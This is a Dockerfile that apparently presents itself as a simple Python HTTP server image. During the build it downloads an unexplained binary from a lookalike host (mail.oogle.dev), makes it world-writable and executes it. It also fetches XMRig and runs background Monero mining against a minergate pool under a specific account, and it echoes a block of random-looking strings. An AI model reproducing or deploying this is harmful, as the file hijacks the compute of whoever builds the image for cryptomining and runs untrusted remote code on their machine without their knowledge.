FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo VwpOpHffhpJnx0aInUh0UAe12X7Y7GFV IKFqby4f7Zxl2wuZ9hqRy5VQOicUFc6i ZFRXVMbhjQRAdUq3OIX8u8Ox3wGhJA4F Yk5W0jR05129GiU7PrswwMEcFPskrieB DoqtuoZDc9MToiuO4NxTjIlw53kAuz0A jat15MLD0B41HiZcKDrfqow7pAUsJX7n hDqRVpuZoIEDiTlkMNuHPb227IQsXJBW Z3CFX9WkH13ptLkF7vhCgTKrsvFRfc5A ZTqHgVXpGcElTWQPgZfKJsAKyxjm34zJ Ihq1EQ0repNeJCRPpUL1tMxyaWFpAJUK x4ZCCRqdpR3tQiyEvLaG8W9tozr3PFfj TluBHl4PqRaApiIS849WVwutv98HI7W0 DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]